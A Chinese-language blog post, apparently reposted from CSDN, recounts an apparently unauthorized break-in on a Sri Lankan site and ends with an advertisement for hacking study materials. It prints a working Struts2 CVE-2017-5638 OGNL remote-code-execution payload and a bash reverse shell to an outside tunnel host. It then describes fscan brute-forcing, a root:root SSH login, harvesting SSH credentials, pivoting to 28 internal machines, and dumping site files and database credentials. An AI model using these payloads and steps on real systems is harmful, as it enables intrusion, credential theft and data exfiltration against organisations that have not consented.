注意:本文章仅用于技术交流学习,请勿用于非法用途,否则后果自负
本次测试的是一个斯里兰卡的站点,相关内容均厚码处理
fofa返回的结果是只有四个资产且全部都是一个域名下的
这是一个后台,但酷酷习题大法在这里已经没用了,由于站点比较冷门,筛不到这个站点,只能一边用漏扫一边手动测。
由于它是后台,我首先想到了sql注入,直接抓到请求包然后扔sqlmap跑
根据其前台的功能点,又找到一处与数据库交互的地方:
分别用sqlmap跑这两个post包后,均失败
此时再查看漏扫:
CVE-2023-48795,是ssh前缀截断攻击,其原理为:攻击者可以在初始密钥交换期间注入任意数量的SSH消息,并在交换完成后移除相同数量的消息,从而破坏SSH扩展协商(RFC8308),可降级连接的安全性。但是,它的利用条件比较苛刻,需要从本地网络发起,这点我们是做不到的。
CVE-2017-5638,这是一个RCE(没想到24年扫到了17年的老洞),这个单位的运维也是上大分了,这个利用很简单,只需要改请求包中Content-Type的值即可实现rce
poc:
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
那么直接发请求包:
也是成功利用了。
先看看它可以通过什么方式反弹shell
whereis nc bash python php exec lua perl ruby
尝试通过nc反弹shell(由于担心攻击机被溯源,我开代理+内网穿透):
不知道为什么连不上,再试试bash反弹:
bash -i >& /dev/tcp/16.tcp.cpolar.top/14898 0>&1
这次成功了
回头看cve-2023-48795,它攻击面较小,条件也是苛刻中的苛刻,这里我附上相关文章,各位感兴趣的观众可以去看看
https://blog.csdn.net/Xxy605/article/details/135199758
这里我想看看它都开着什么端口,本能地输入了一个nmap,没想到还真有(运维上大分)
因为可以出网啥的,我就直接塞了个fscan进去,然后开始扫端口,ip
开了个zabbix
扫了一顿啥也没有,一看版权信息是2019的,搜一下历史洞
搜到了cve-2022-23131,cve-2024-22116,不过这些漏洞均无法利用。
这里尝试./fscan -h 172.20.1.1/16 -c id -t 100000来爆破一下内网机器
扫了一顿发现172.20段有且只有172.20.252.1存在弱口令(root:root),然后history看到前面的几条命令有很多ssh连接记录(记录均为内网),果断翻找ssh凭据,同时fscan扫描整个172段
像这样的ip出来了28个
测试了一下也都可以登上去,只能说逆天
也可以出网
此时我黄豆就开始幻想了,幻想自己是比肩年姐那样的顶尖红队大玉,可以手撕内网
为了拓宽攻击面,我 cat ~/.ssh/known_hosts
只有可怜的五台(172.20.252.2还登不上去)
然后再来看3389(windows上的内网渗透容易于linux)
未果
那现在只能先脱网站文件,审计来扩大攻击面了(又特么回到起点了)
tar -cvf 114514.tar *
一边脱着,我就想看看他装了什么软件,直接yum list,然后给我报了个这个玩意:
没想到还有个邮服,属于是意外之喜了
目前收获:内网机器*28,邮服*1
然后审到了数据库账号密码,想进一步看看数据库,没想到这羁绊系统,虽然有17年的陈年nday但是还有蓝队值守,给我光速拔线了
屋檐了。
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂这些资料!
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
题外话
黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,之前都是内部资源,专业方面绝对可以秒杀国内99%的机构和个人教学!全网独一份,你不可能在网上找到这么专业的教程。
内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,200多G的资源,不用担心学不全。
因篇幅有限,仅展示部分资料,需要见下图即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
3.技术文档和电子书
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
4.工具包、面试题和源码
“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。
还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。
这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。
参考解析:深信服官网、奇安信官网、Freebuf、csdn等
内容特点:条理清晰,含图像化表示更加易懂。
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源
————————————————
本文转自 https://blog.csdn.net/Python_0011/article/details/148849396?spm=1001.2014.3001.5502,如有侵权,请联系删除。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
